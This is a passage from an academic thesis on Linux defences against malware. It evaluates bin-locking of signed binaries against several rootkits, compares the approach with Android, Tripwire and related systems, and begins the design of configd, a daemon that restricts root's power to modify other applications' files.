We modified the Debian package manager to not write out bin-locked binaries to temporary files during the installation of the system (since once written into a temporary file, the modified kernel will not allow the file to be moved or deleted). Instead, the package manager writes out an eight byte prefix (we used the prefix CODESIGN) followed by the signed file (which is recognized as such by the modified kernel during replacement of the original signed file, as mentioned above). The binary rewriting application was used along with several additional scripts to create a local Debian 4.0 mirror where every application binary and library was bin-locked.
One element in the standard Debian boot process initially posed an issue for our bin-locking process. During the boot process, the temporary initial RAM disk (a file-system within RAM which stores files used early in the boot process) is deleted because it is no longer necessary. If this initial RAM disk contains binaries that are bin-locked, the new kernel prevents the delete. To overcome this, bin-locking is disabled in the prototype on drives not associated with a physical device.
As partial evidence that the modified kernel and signed executables are viable, a paper was written on a test system (which used the prototype implementation). On the system, all binaries and libraries were bin-locked and kernel restrictions were active. The test system, while running KDE (the graphical K Desktop Environment), was also used to browse the web, write e-mail, listen to music, and view video – all with no noticeable differences from an ordinary system. This confirmed that it is possible to lock down the kernel interface, as well as use bin-locking on a deployed system, with the resulting system still usable for everyday tasks.
Any performance impact of the proposed system was imperceptible to this thesis' author, the end-user, during the writing of a paper (and indeed while performing other common activities such as web browsing, video watching, and image editing). For more precise measurement, we ran benchmark tests to quantify the overhead of the system. Using the Perl benchmark library, we measured the average increase in kernel time required to perform a delete and move operation on both non-ELF and unsigned ELF files with an ext3 file-system. Over 25000 test runs (10000 with a small file, 10000 with a medium one, and 5000 with a large file), the average increase in time to delete or move a non-ELF file was 15.59% or 6.032µs when the file was cached. The time required to open a cached non-ELF file for writing similarly went up by 34.84% or 3.86µs. For unsigned ELF files, the overhead of deleting or moving the file increased by 26.77% or 13.3µs. The overhead of opening an unsigned ELF file for writing increased by 66.65% or 7.73µs. All tests were performed on a Pentium 4 at 2.8GHz with 1G of RAM. While these percentage increases are high for opening a file, the amount of physical time required to open a file remains small. In the interest of retaining file-system compatibility with kernels not enabling bin-locking, we chose not to optimize the overhead of moving, deleting, and opening bin-locked files. By reserving one bit per file on the file-system for indicating whether a file is signed or not, this overhead could be brought down to essentially 0%.
When the file was not cached, the time required to perform an update, move, or open varies with the speed of the hard drive. Determining if a file is bin-locked requires three additional hard drive accesses. The first disk read is to bring in the data block pointers, the second is to read the ELF header, and the third is to read the section table. With a delete, the data block pointers need to be read from disk anyway, resulting in bin-locking requiring an overhead of just two additional disk reads. During prototype testing, the average increase in time required to both delete and move a non-cached³ and unsigned ELF file was 28ms. This overhead can also be brought down by tracking whether files are bin-locked on the file-system.

³Disabling disk caching involves writing other information to memory, causing the cached file to expire and be removed from disk cache.
The cost of replacing a bin-locked file (i.e., the cost of validating the signature on a signed binary) is O(n) in the proposed system (where n is the size of the file), an increase from O(1) in a system not enforcing the protection mechanism. This overhead translates to 111.8ms on the test system for a 1M binary (with disk caching and using the older digital signature verification implementation mentioned above). The overhead is apparently unavoidable, since the entire file must be hashed to verify a digital signature. We emphasize that this cost is only incurred during the install or upgrade of a bin-locked binary, not while performing normal tasks (i.e., executing an application).
Protection Against Current Rootkits
To verify that the bin-locking system was able to defend against rootkit malware, we attempted to install several Linux rootkits. Linux rootkits can be grouped into two categories. The first category is those that use some method to gain access to kernel memory, installing themselves in the running kernel. These rootkits then operate at kernel level, hiding their actions from even root processes. The second category consists of rootkits that replace core system binaries. These binaries are often used by the root user in examining a system. Both classes of rootkits work to hide nefarious activities and processes on a compromised system.
We selected six representative Linux rootkits, two that modify the kernel and four that replace system binaries. Both kernel-based rootkits (suckit2 and mood-nt) failed to install because of disabled write access to /dev/kmem. The mood-nt kernel based rootkit which we tested also attempted and failed to replace /bin/init (in order to re-initialize itself on system boot); this replacement was denied by the modified kernel. The four binary replacement rootkits (ARK 1.0.1, cb-r00tkit, dica, and Linux Rootkit 5) were all denied when attempting to replace core system programs (e.g., ls, netstat, top, and ps).
The bin-locking prototype provided protection against the modification of both application and system binaries. The fact that no rootkit was able to install is supporting evidence of expected protection functionality of the bin-locking system.
Because the prototype requires a reboot to delete or move bin-locked binary files, the process of rebooting into a kernel which does not enforce bin-locking must be as usable as possible. We used the standard GRUB boot loader to provide an option to the user as to whether or not to use the bin-locking enabled kernel; the user must then select one of the non-enforcing kernels from the menu during boot. Once booted into an alternate kernel, the user may delete and move bin-locked files, including those installed by malware (as discussed earlier in this chapter). An open problem is how to persuade users to choose to use the kernel which enforces bin-locking. Creating a trusted interface between the kernel and user (e.g., see Ye et al.) – one that cannot be subverted by malware – may help eliminate the reboot requirement; as noted earlier, a hardware key is one such option.
Protection Against Downgrade Attacks
The downgrade attack involves an attacker replacing a recent version of a file with an earlier version known to contain vulnerabilities. To protect against this attack, we suggest deploying versioning (as discussed above). Should the particular implementation of bin-locking not support the versioning extension, developers can protect against the downgrade attack by introducing new public verification keys and expiring older keys when releasing a new version of the binary known to fix vulnerabilities. Since the key will have changed, none of the public verification keys in the newer binary (which is currently installed) could be used to validate a signature in the old binary, and downgrade would be prevented.
Table 5.1. Comparison of related file-system protection mechanisms: bin-locking (this chapter), Google Android v2.0, rootkit-resistant disks, Tripwire, and read-only media. The granularity indicates to what extent the principle of least privilege is applied when modifying files.
Related Work
We first compare bin-locking with several closely related proposals and then discuss other related work below. Table 5.1 focuses on Google Android v2.0, rootkit-resistant disks, Tripwire, and the use of read-only media, comparing the approaches on whether they are proactive (prevent versus detect modifications), accommodate upgrades (without extra end-user effort), the types of files they protect, and the granularity of protection. While only bin-locking and Android accommodate program upgrades, the table is not the full story. We now discuss differences in more detail.
In parallel to and independent of our work (but subsequent to publication of our preliminary design), Google introduced a signing approach in the Android platform which closely parallels bin-locking. An application developed for Android v2.0 is packaged and signed with a private key created by the developer. As with bin-locking, there is no requirement for a public key infrastructure. Application updates under Android are allowed if all public verification keys in the new version are also in the installed version of the package, and can be used to verify the corresponding signatures in the new version (variation 2 above). In contrast to bin-locking, Android precludes new public verification keys being introduced during upgrade. While bin-locking signs individual binaries, Android signs application packages. Each application is copied into its own separate directory during install by the Android OS. The OS keeps track of application signatures and prevents applications from overwriting files outside their install directory. The Android approach protects all types of files, not just application binaries. Backwards compatibility requirements preclude bin-locking from assuming that all data associated with an application is installed into the same directory (e.g., configuration files are commonly all stored in /etc and binaries stored in /usr/bin on Linux). The Android signing approach is a customized solution for the platform because of the constraints it puts on how and where applications are installed. Bin-locking comes as close as possible (in our view) to a general solution while preserving backward compatibility with current file-system layouts.
In Android version 1.6, each public key is tied directly to a signature it can be used to verify (see the discussion of variation 1 above). This enforces that keys cannot be added in subsequent versions of the application package (again, as discussed above). The tying of keys directly to signatures instead of using a key prefix is an artifact of using the Java archive signer. Another artifact is that an application can be repeatedly signed with previous signatures remaining valid (recall, bin-locking does not allow this because it also signs all bin-locking metadata and keys). In preventing signatures corresponding to new private keys from being added to subsequent versions of the application, an attacker is prevented from signing a valid package to produce a new valid package including a signature corresponding to a private key that the attacker possesses.
Rootkit-resistant disks by Butler et al. rely on the user inserting a hardware token every time an area of the disk "protected by" that token is updated. New changes written to disk with the token inserted are marked as requiring the presence of that token in order to be modified. While rootkit-resistant disks protect a much larger range of file types than bin-locking, a knowledgeable user is required to insert the hardware token whenever any write operation is performed to the protected files (including updates). To protect every application separately, a different hardware token would need to be used for every application installed on the system. If only one token is used, then any application can modify any other application arbitrarily as long as the hardware token is inserted. A single-token system fails entirely if the user is ever tricked into running malware during the time the token is inserted (including if the token is inserted after malware has started running).
Combining rootkit-resistant disks with bin-locking would eliminate the most common instance which would require the token – a software update. A combined solution would also increase the granularity of the rootkit-resistant disk solution while protecting all types of configuration files – a protection the current bin-locking approach does not provide.
The general approach of restricting writes to the file system as a method to combat malware is longstanding. Simply asking the user for authorization every time a file is modified on the system results in an unworkable solution, even for experienced developers. Rootkit-resistant disks go a long way toward creating a workable solution. Bin-locking takes the approach further in allowing updates to be performed without user intervention.
Tripwire and Read-Only Media
Tripwire records cryptographic checksums for all files on a system to detect what files are changed by malware (by comparing against the current checksum). Read-only media prevents any change from being made to the drive while the system is running, allowing the user to revert to a known-good state by simply rebooting the system. While Tripwire and read-only media differ from each other in their ability to prevent changes to the file-system, they share many characteristics, the most prominent being the way they deal with software installs and upgrades. With read-only media, the install or upgrade must be made on a system with writable media and then a new version of the read-only media is created – a potentially time-consuming process. With Tripwire, all changes to the file-system are flagged as potentially bad and the user must verify that each file modification is indeed acceptable (also a time-consuming process). In both cases, security patches become troublesome to install. With Tripwire, the user has the option of verifying that an application does not overwrite core system binaries during install or upgrade – the same is not the case when updating read-only media. Tripwire does not prevent the modification of a file; it only detects these modifications.
Other Related Work
Related to work by Butler et al., SVFS also protects files on disk, at the cost of running everything in a virtual machine. Software updates and installs are not addressed by SVFS. Strunk et al. proposed logging all file modifications for a period of time to assist in the recovery after malware infection. Their approach does not prevent binaries from being modified in the first place. By combining their approach with bin-locking, logging can be restricted to configuration file changes – decreasing disk space requirements.
There have been many attempts at detecting modifications to binaries (in addition to Tripwire, discussed above). Windows file protection (WFP) maintains a database of specific files which are protected, along with signatures of them. The list of files protected by WFP is specified by Microsoft and focuses on core system files. WFP is designed to protect against a non-malicious end-user, preventing only accidental system modification. Pennington et al. proposed implementing an intrusion detection system in the storage device to detect suspicious modifications. All these attempts rely on detecting modifications after the fact. While WFP is capable of handling updates, the other solutions do not appear to directly support binary updates.
Apvrille et al. presented DigSig, an approach which also uses signed binaries in protecting the system. They modified the Linux kernel to prevent binaries with invalid signatures from being run (as opposed to the bin-locking approach of preventing the modification). Under DigSig, all binaries installed must be signed with the same key. While the use of a single key may work for corporate environments deploying DigSig, it does not seem well suited to decentralized environments. DigSig also relies on a knowledgeable user to verify all updates to binary files (similar to Tripwire) before signing them with the central key.
The approach to bin-locking differs from that of van Doorn et al. (and indeed many other signed-executable systems such as those by Pozzo et al. and Davida et al.). In these systems, the installation (or running) of binaries is restricted by whether or not the application is signed with a trusted key. In contrast, bin-locking does not restrict the introduction of new executables (those with new file names) onto the system and does not rely on any specific root signature key being used, or external notions of trusted keys; it does not rely on any centralized PKI.
With all the approaches described (with the exception of that by Butler et al. when using multiple tokens), it seems one common pitfall is that any application performing an update or install will have permissions sufficient to modify any other binary on the system. Some proposed systems attempt to mitigate this threat by assuming a vigilant and knowledgeable user will verify all changes to binaries. They rely on this user to never be tricked into installing a Trojan application. We believe that by differentiating between files originating from different developers or organizations, bin-locking can rely less on vigilant and knowledgeable users to protect some parts of the system. All approaches except bin-locking treat upgrades the same as new application installs.
While policy systems such as SELinux have the capability to restrict configuration abilities, the overhead of correctly configuring a policy for every application (including every installer) makes this approach unrealistic in many environments. Bin-locking allows binaries to be protected based on who developed (or created) them, a property not easily translated into frameworks such as SELinux. While projects such as DTE-enhanced UNIX and XENIX restrict the privileges of root (reducing the risk of system binaries being overwritten), installers (and even upgrades) are still given full access to all binaries on disk.
The OpenBSD schg and ext2 immutable flags are similar to bin-locking in that they prevent files from being changed, moved, or deleted. These flags, however, do not allow an application binary to be updated, resulting in a system more akin to read-only media (see the discussion of Tripwire and read-only media above).
Conventional code-signing involves verifying the author (code source) before software is run. Code-signing approaches generally do not restrict what the software can do while running. When applied to installers, code-signing allows a user to verify the source of the software they are about to install (and that the software has not been modified since the vendor signed it) – the same is true for package managers. In both cases, the signature applies to the entire package (not to the individual binaries) and does not end up restricting which binaries either the installer application or installed program can modify. While some systems may maintain a cryptographic hash for files installed, these hashes are more akin to those used by Tripwire (see above). Hashes alone are insufficient for tying two versions of a binary to the same source. While the bin-locking approach can prevent binaries modified during distribution from being installed as an upgrade, we do not focus specifically on this problem as do Bellissimo et al.
The approach discussed in this chapter provides a convenient method for tying the product of a developer's efforts to the developer. While we took the approach of tying binary files the developer created to a key the developer holds, the approach is equally capable of tying other digital objects (or indeed, collections of objects such as an application package) to the developer key. Should the specific implementation created by the guardian not support unsigned binaries, all developers would be forced to sign their applications. We believe such a restriction would not overburden developers, since the process of a developer signing an application does not require any third party. Android already enforces such a requirement: all applications must be signed before being installed. The approach of isolating the work of a developer from modification by others, without the use of a centrally managed PKI, provides a mechanism for restricting the abilities of malware. The approach does not rely on the end-user for enforcement, protects all applications using the approach, and is implemented by a guardian (the OS developer). It therefore follows the thesis goal of providing a guardian-enforced mandatory access control mechanism which can be deployed.
Configd: Reducing Root File-System Privilege
While the principle of least privilege dictates that the privileges assigned to a process should be no more than the privileges required to perform the designed task, the standard exercising of root privilege in order to install applications does not follow the principle. While some progress has been made by encouraging users and daemons not to run as root, the same cannot be said for installers – perhaps the most common use of root privilege in the current computing environment is for system reconfiguration (i.e., installing, uninstalling, or upgrading software). In this chapter, we pursue reducing the file-system privileges of root in order to better protect a system against abuse.
The actions performed by any user (including root) on a system can be partitioned into two classes. The first involves actions related to performing day-to-day operations on the system (e.g., writing a paper, browsing, reading email, or playing a game). Such actions typically do not have a lasting impact on the state of the system (modulo data file creation and deletion). The second class involves actions related to changing system configuration. We define the configuration state of a system as the set of programs installed, as well as the global configuration related to each program. In order to survive reboot, both the programs installed and all global configuration state must be saved into the file-system, and hence we focus on those configuration operations having a direct visible effect on disk.
In this chapter, we focus on preventing one application from modifying another's file-system objects on disk. We focus exclusively on system-wide application data, configuration, and binary files (i.e., we do not consider user data files in this chapter). The common protection long used in practice is to limit write access to application file-system objects (e.g., files including binaries, directories, symbolic links, and other objects that are part of the file-system) to root. This protection mechanism fails to prevent abuse by applications during install, upgrade, or uninstall. In today's computing environments, it is only realistic to treat any two applications on a system as mutually untrustworthy.

Given this updated threat model, we further subdivide configuration in order to encapsulate applications – by this we mean that while it may be possible for one application to read the binary, data, and configuration files belonging to another application, it is not possible to modify another's files on disk. In contrast, current desktop approaches for software installation do not prevent an application from modifying or deleting file-system objects related to or created by an unrelated application. Our restriction and division of root file-system permissions addresses this problem, without requiring any radical change in file-system layout (e.g., applications can still install their binaries in a common location such as /bin). As a direct result, applications are better protected from malware and other applications, even those running with root privileges. The approach discussed in this chapter is distinct from that discussed in Chapter , in that we focus on enforcing additional protection mechanisms on all types of configuration related files, not just application binaries.
In our design (the preliminary ideas of which were outlined in a workshop paper), the ability to modify arbitrary objects (beyond simply files) on the file-system is removed from root and reassigned to a process running with a new configuration privilege. This process in turn can be used to prevent one application from modifying the file-system objects related to another. In creating a distinct configuration permission, the configuration tasks currently performed under root privilege are separated from the everyday tasks. Daemons, applications, or installers running as root no longer automatically inherit configuration privilege. Configd acts as a reference monitor for system configuration.
Our implemented prototype, using Debian 5.0 as the base environment, consists of a modified Linux kernel which restricts updates to designated file-system objects, a modified Debian package manager, and a user-space daemon (called configd) which is responsible for protecting an application's file-system objects from being modified by other applications. A control point made available in configd allows each configuration related file-system modification request to be examined, and either authorized or denied. As we explain in detail later, the prototype successfully prevented installation of current rootkit malware while having an imperceptible overhead to the end-user. While our discussion and prototype focus on Linux, we believe the approach can be adapted to Windows, Mac OS X, BSD, and other operating systems. Indeed, configd implemented on Windows could also protect the Windows registry (since it is stored on disk).
1 This prototype is distinct from the prototype in Chapter .
Background on Installers
Our approach of limiting abuse of root privilege as it relates to configuration changes of designated file-system objects is most relevant to the case of software installs, upgrades, and uninstalls. For context and to highlight the problem, we review existing approaches to installing software on a desktop.
The most common approach to installing applications on commodity desktops and servers is through the use of an application installer. The installer is a binary or script, often written by the same company or individual that developed the application. Its purpose, when run, is to place the various file-system objects associated with the application in the correct location and configure any system parameters (e.g., in some cases to ensure the program gets run during boot). Application installers are typically given complete control over the system during install, with users encouraged to run them with full permissions, as shown in Figure 6.1. Whenever an application installer is run on a typical system, the entire system is opened up for modification by the installer. If the installer is malicious, or can be compromised, the entire system can become easily compromised. This approach does not prevent one application's installer from modifying the file-system objects of another application.
Figure 6.1. Windows prompts to run an installer with administrator privileges: (a) a Windows XP prompt; (b) a Windows 7 prompt.
Application install scripts, like those executed through the make install command on many open source projects, are a slight variation of the application installer. When told to install to a user's home directory, they do not require administrator privileges. They still require administrator privileges, however, when attempting to install to a location controlled by the administrator. Using make install does not prevent modification of file-system objects belonging to other applications installed by the same user. While Windows encourages following the principle of each application installing into its own directory on the file-system, the practice of running application installers as root leaves the principle unenforced.
Package managers are typically provided by an operating system (OS) or OS developer to ease development of an application installer for the platform. Instead of writing an application installer from scratch, the application developer creates a package using the package manager APIs and following the rules set by those who developed the package manager. Typically, the package consists of data used by the package manager, as well as files to be installed and scripts to run as part of the install. Common install operations are taken care of by the package manager. While the development of package managers has resulted in installers transitioning from being executables to packages (e.g., various Linux packages, Microsoft Installer packages, and Apple application packages), most of these package managers still allow for executing arbitrary binary code or scripts contained in the package being installed, resulting in the same level of risk to the system as if an executable was run to perform the install. If root permission is requested by the package (or required by the package manager, as is the case with Linux packages), and the end-user enters an appropriate password when prompted (as users are now well trained to do upon request), these scripts are run as root. The use of application packages does not prevent an application from modifying arbitrary file-system objects. One example of a malicious Debian package was a screensaver posted on a website; the package, when installed, would also download and install a bot onto the local machine.
Apple Bundles and Packages
With Mac OS X, Apple introduced a new method for installing commodity applications other than application packages: application bundles. This results in two approaches on Mac OS X for installing software.
Figure 6.2. A KPackage prompt to obtain root privileges before installing a package.
Application bundles are similar to packages as discussed above, with two key differences. The first is that all file-system objects in the bundle will be installed into the same sub-directory by the OS (akin to the approach used on Android, described in Section ). The second is that scripts are not run by the OS during install. Typically, application bundles are installed through a drag-and-drop style copy operation. Commonly distributed as disk images, application bundles greatly increase the security of the system against malicious application installers. Unfortunately, Apple still supports a second approach for installing applications and relies on the software developer to choose between them. The malicious developer is unlikely to distribute his software as a bundle when distributing a package (see below) is possible. Legitimate applications are distributed as both bundles (e.g., Mozilla Firefox) and packages (e.g., Adobe Flash).
While application bundles remove the ability for many applications to obtain root privileges, they do not mitigate the entire threat. Any application which obtains root privileges (maliciously or otherwise), even if installed as a bundle, can still modify any file on the system.
Application Packages in Mac OS X
For more complex applications, additional actions (other than simply copying the files into the application directory) may need to be performed by the installer during the install process. For these applications, Apple provides an application package framework as discussed in Section .
The status quo across multiple operating systems is to "restrict" installers by requiring the user to authorize an installation by entering an administrator password before the installer can run. Once the installer is given "blind" full permission to the system, the user must trust that the installer does not abuse its privilege (since it is difficult to tell what the installer actually does with its root privilege – thus we call it blind trust).
Approaches for Encapsulating Applications
In this section, we discuss several approaches for encapsulating applications, using the definition of encapsulation from page . While we choose to implement the GoboLinux approach in configd (as discussed later in this chapter), the alternative approaches discussed in this section are equally viable. We summarize the three approaches in Table 6.1. Note that although Table 6.1 indicates that for GoboLinux, application upgrades are not supported, the use of the GoboLinux approach in configd is done in such a way that application upgrades are supported.
Table 6.1. Characteristics of current systems which encapsulate applications on disk, comparing how each system (GoboLinux, Android, and the Apple App Store) handles application upgrades, whether install scripts are allowed, and how applications are deployed.
GoboLinux

In GoboLinux (version 014.01), each application is installed into its own directory (similar to Android). The actual install of a program is done through calling three scripts. PrepareProgram is responsible for creating the base directory where the program will be installed. CompileProgram takes a compressed archive of the program source, configures it with the appropriate flags so it will be installed into the directory prepared for it by PrepareProgram, compiles the program, and installs it. SymlinkProgram creates symbolic links to the various program binaries, libraries, and settings. For backwards compatibility, the common Unix directories (e.g., /usr/bin, /sbin, and /lib) are also linked to /System/Links, which is in turn populated with symbolic links for each of the applications that have been installed. To decrease the ability of an application to escape its assigned application directory, the make install command is run under a special user ID. This user is only allowed to modify files under two directories: the one the application is being installed into, and the one it was compiled from. In restricting an application during both compile and install, the other applications on the system remain protected against modification.
For those applications which are not complete programs in themselves but instead extensions to other applications which are already on the system (e.g., the PHP module is often installed as an extension to the web server Apache), the base application needs to be made aware of the extension. In GoboLinux, the configuration of each application is stored in the shared tree /System/Settings/. All files in this directory are symbolic links that point back to the settings folder, which is a sub-directory of where the application was installed. The base application provides a directory under /System/Settings where a module can register itself (through SymlinkProgram). Many distributions other than GoboLinux have also adopted this as the method of installing extensions into a base application (although the exact path to the configuration will change). Another related example involves services which should be started on system boot. On Debian-based distributions, the accepted location for a script responsible for starting a service is in the directory /etc/init.d. GoboLinux places scripts responsible for starting the various system services in /System/Links/Tasks.
GoboLinux depends heavily on symbolic links being placed into the above-mentioned standard directories for extensions to applications. The base GoboLinux executable SymlinkProgram is responsible for updating this directory tree based on the layout of files in any particular application directory (GoboLinux does not allow application installers to directly modify the symbolic links in shared directories).
A limitation of GoboLinux is that it does not cleanly support upgrades (or security patches) to an application. Each upgrade is treated as an install of a new version of the application, resulting in each version being installed into its own directory on disk. The job of sorting out which version of an application should be used by default on a system is left to SymlinkProgram (the PATH environment variable is set to point to /System/Links/Executables, a directory maintained by SymlinkProgram). The sharing of configuration files between different versions of an application is left up to the individual application. Indeed, each version of an application has its own copy of the configuration files stored in a Settings sub-directory of the application directory, alongside the various sub-directories for each version of the application which is installed.
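To make the shared-link mechanism concrete, the minimal C sketch below performs the kind of operation SymlinkProgram carries out: publishing an application's binary into the shared /System/Links/Executables directory via a symbolic link. The per-application path /Programs/Foo/1.0/bin/foo is hypothetical and used only for illustration; this is not GoboLinux's actual code.

    #include <stdio.h>
    #include <string.h>
    #include <errno.h>
    #include <unistd.h>

    int main(void)
    {
        /* Hypothetical per-application install location (GoboLinux-style). */
        const char *target    = "/Programs/Foo/1.0/bin/foo";
        /* Shared directory of symbolic links maintained by SymlinkProgram. */
        const char *link_name = "/System/Links/Executables/foo";

        /* Publish the application's binary by linking it into the shared
         * tree; only SymlinkProgram (not the installer) may modify it.     */
        if (symlink(target, link_name) != 0)
            fprintf(stderr, "symlink failed: %s\n", strerror(errno));
        return 0;
    }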
While we choose in this thesis to maintain the current file-system hierarchy, negating the need for symbolic links, changing the file-system hierarchy and incorporating the functionality of SymlinkProgram into configd is another approach which can be used to encapsulate applications. The approach used by CompileProgram, where associated installation scripts are run with permission to write only to files directly associated with the same application, restricts installation scripts while still allowing them to exist. We discuss an implementation of this approach in configd in Section .
Android

On the Android (version 2.0) platform, each application package is assigned its own directory and unique user id. While Android uses the Linux kernel as its base, being a single-user platform, Android remapped the traditional user accounts to restrict communication between applications. The Android application installer ensures that each application is restricted to making file-system modifications in the directory it was installed into. Unlike the file-system hierarchy standard as used on Linux, there are no shared directories for storing binaries, libraries, configuration files, and other elements. Android benefits greatly from the ability to mandate a file-system layout which restricts each application to a single sub-directory on the file-system.
The Android (version 2.0) platform only allows a new version of an application to be installed over top of the old if all public keys in the new version are also contained in the old version already installed (new keys cannot currently be introduced during an upgrade). During the install of an application, the application itself is not given a chance to run any installer scripts as administrator – greatly restricting the damage a particular application can do to files belonging to other applications. The platform does a good job of preventing one application from modifying another's files.
With additional work, the Android approach can be adapted to the standard Linux file-system hierarchy. Instead of storing all files related to an application in a single directory, a database could be maintained which maps each individual file to the application it is associated with (the Debian package manager already keeps such information), as well as a list of public keys which are used to verify the next version of the package. The Android approach does not support scripts being run as part of the installation process (similar to Apple bundles not supporting scripts; see Section ). Combining the Android approach with GoboLinux, however, allows the execution of installation scripts which can modify the configuration of the application being installed while still preventing other applications from being modified.
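As a rough illustration of the database idea just described, the following C sketch maps each installed file to the package that owns it, alongside the keys that could vouch for the package's next version. All structure, file, and key names here are hypothetical; they are not taken from dpkg or from the configd prototype, and signature checking itself is omitted.

    #include <stdio.h>
    #include <string.h>

    #define MAX_KEYS 4

    /* Hypothetical record tying one installed file to the package that
     * owns it and to the public keys accepted for that package's next
     * version (checking those keys is omitted from this sketch).        */
    struct file_record {
        const char *path;               /* installed file path           */
        const char *package;            /* owning package                */
        const char *key_ids[MAX_KEYS];  /* accepted key fingerprints     */
    };

    /* Toy in-memory "database"; dpkg already keeps the file-to-package
     * mapping persistently.                                              */
    static const struct file_record db[] = {
        { "/usr/bin/foo",  "foo", { "KEYID-A" } },
        { "/etc/foo.conf", "foo", { "KEYID-A" } },
    };

    /* May an installer acting on behalf of package 'pkg' modify 'path'? */
    static int may_modify(const char *pkg, const char *path)
    {
        for (size_t i = 0; i < sizeof(db) / sizeof(db[0]); i++)
            if (strcmp(db[i].path, path) == 0)
                return strcmp(db[i].package, pkg) == 0;
        return 1;   /* file unknown to the database: not protected       */
    }

    int main(void)
    {
        printf("%d\n", may_modify("bar", "/usr/bin/foo"));  /* 0: denied  */
        printf("%d\n", may_modify("foo", "/etc/foo.conf")); /* 1: allowed */
        return 0;
    }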
Apple Application Bundles
While the general application bundle is discussed in Section , a number of restrictions were made by Apple for bundled applications targeting iPhones (up to those released in January 2010). The biggest change is that each application installed onto the iPhone is limited to making file-system modifications only in the directory it was installed into. This includes limiting an application to reading and writing data files to an application-specific area of the file-system (similar to Android).
In contrast to Android, Apple application bundles targeted to the iPhone are not signed with the key of the software developer. Instead, each application must be signed by Apple before it can be run on an iPhone (we ignore "jail-broken" iPhones in our discussion). Before signing an iPhone application bundle, Apple examines the application to ensure it meets their criteria. For application bundles designed for Mac OS X, Apple has no such restriction that the bundle be verified and signed by Apple before it can be installed.
The Protection Mechanism
Our main objective in this chapter is to divide root privilege so that programs, such as installers, cannot take advantage of overly coarse access controls to abuse the privileges they have been given. The design of our approach is subject to several self-imposed constraints. We believe that, to be viable, any alternate approach for restricting file-system privileges on the desktop at a per-application level would need to fulfil the following considerations.
1. Compatibility with current file-system layouts. In designing a Linux-based prototype of the proposal, our goal was to avoid requiring redesign of the current file-system hierarchy in favour of a solution compatible with the current file-system layout. Applications are encapsulated, being protected against modification while retaining the current file-system layout – installing files to directories shared with other applications. In contrast, GoboLinux and Apple (in Mac OS X) did redesign the file-system hierarchy. Their motivations were apparently to impose cleanliness in restricting each application to its own directory. While the separation of each application into its own directory may simplify the challenge of restricting configuration changes on a per-application basis, a backwards compatibility layer is still required to support applications not designed for the new layout.
2. Minimal impact on day-to-day operations. Most of the time, a computer is used to perform day-to-day tasks (run applications) with a constant configuration of the applications and operating system. Occasionally, its configuration is modified in order to expand/modify the tasks it can perform (e.g., applications are installed, updated, removed, or reconfigured). Our proposal (and indeed any alternate configd approach) should impose no noticeable impact on such day-to-day operations, with no changes to regular user work flow.
3. Backwards compatibility for current installers. We introduce new restrictions on an application's ability to modify file-system objects. These restrictions will typically influence the install, upgrade, and removal of applications. It is unrealistic to assume that all installers will be modified in parallel during deployment of such a solution. Backwards compatibility is therefore critical for incremental deployability.

In the prototype, to ensure that all file-system operations modifying configuration related files are handled by configd, a kernel security module was written which redirects all requests for modification to configuration related file-system objects to configd for verification. Any application not written explicitly to communicate with configd, including all scripts run as part of an application install, would have their file-system operations rerouted. In addition to implementing a backward compatibility layer, the prototype uses a modified package installer for Debian – compatibility was maintained with standard Debian packages. We foresee any alternate use of the control point provided by configd as also having to support current install methods (subject to the constraint that the installer does not attempt to break the per-application encapsulation restrictions).
4. Usability. Our focus in this thesis is on providing a solution which can be used by non-expert users, and to avoid forcing upon users choices which they are ill-equipped to respond to correctly. Our solution achieves this goal, allowing an application's file-system objects to be protected against modification during install, upgrade, uninstall, and at run-time, without presenting the user with complex choices. While our prototype solution did leave enabled the option of querying the user about file-system operations, this feature can be safely disabled (as discussed in Section ).
5. Other considerations. We assume that the user of a computer system can be trusted not to be malicious. The proposal, therefore, does not protect against physical attacks, such as rebooting into a kernel that does not enforce the proposed protection. Its security also assumes that applications cannot obtain kernel level control of the system, although on most current systems, any application running with root access can modify the running kernel. This assumption therefore relies on the mechanism presented in Chapter to be in place.
A Division of Root Privileges
To build a system designed to reduce root abuse of file-system privileges, we first separate configuration related activities (those configuration actions affecting the applications installed or their global configuration as stored on disk). We then further subdivide the configuration privilege to remove the ability of an application installer to modify any file-system object other than those which are part of the application being installed (or upgraded/removed). While Chapter focused on enforcing additional protection mechanisms on binary files using bin-locking, we now focus on enforcing additional protection mechanisms on all types of configuration related files (through the use of configd), not just application binaries.
Our prototype design consists of two main elements: a kernel extension and a user-space daemon. The user-space daemon is responsible for the bulk of the work, namely, ensuring that one application cannot modify files related to a different application. The kernel is responsible for denying (or forwarding) requests to modify protected file-system objects, by which we mean files (including binaries), directories, symbolic links, and other objects that are part of the file-system. Protected file-system objects (which we call c-locked file-system objects, short for configuration locked) are designated (marked) as such by the user-space daemon (an alternate method of protecting file-system objects is by using a union file-system to redirect writes). Any application file-system object marked as part of the system configuration (and hence to be protected against modification by other applications) must be so designated. While we leave open the exact set of c-locked file-system objects, we view the set to include shared libraries, executables, system configuration files, start-up scripts, and other file-system objects which do not change as a result of day-to-day system use. In effect, the system configuration on disk includes the set of applications installed as well as each application's files which are required at run time. Only a process holding a newly introduced configuration permission is allowed to modify the system configuration on disk (and hence c-locked file-system objects).

2 While some have proposed that the user cannot be trusted, our work avoids declaring the user as the enemy and preventing them from modifying their own system. We favour persuasive tactics as a tool to encourage users to properly maintain their system while not taking the control out of their hands.

3 We define the kernel (and hence kernel level control) to include only those aspects running with elevated CPU privileges (ring 0 privileges on x86); this definition does not include core system libraries installed alongside the OS but run in user-space.
The exact distribution of duties within our design makes the kernel responsible for the following (a simplified sketch of the corresponding check appears after the list):
1. Restricting to programs running with configuration permission the ability to delete, move, and write to c-locked file-system objects. By design, "root" is not allowed to make arbitrary changes to c-locked file-system objects (including the kernel image) – changes are limited to processes running with configuration privilege.
2. Restricting the ability to obtain configuration permission. In our prototype, this is done by allowing only a single process, the configuration daemon (configd), to have configuration permission.
3. Restricting the ability to control the process running with configuration permission (e.g., by not allowing configd to be killed or modified by a debugger).
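The kernel-side decision can be pictured as a small predicate consulted on every delete, move, or write to a file-system object: if the object is c-locked, only a task holding the configuration permission (in the prototype, only configd) may proceed. The sketch below is purely illustrative; the type and field names are hypothetical and do not correspond to the prototype's actual kernel code.

    #include <stdbool.h>

    /* Hypothetical, simplified view of the kernel-side check.            */
    struct task  { bool has_config_permission; };  /* only configd holds it */
    struct inode { bool c_locked;              };  /* set on c-locked objects */

    /* Consulted before any delete, move, or write to an object.  Root gets
     * no special treatment: without configuration permission, even a
     * root-owned process is denied access to c-locked objects.            */
    static bool may_modify_object(const struct task *t, const struct inode *i)
    {
        if (!i->c_locked)
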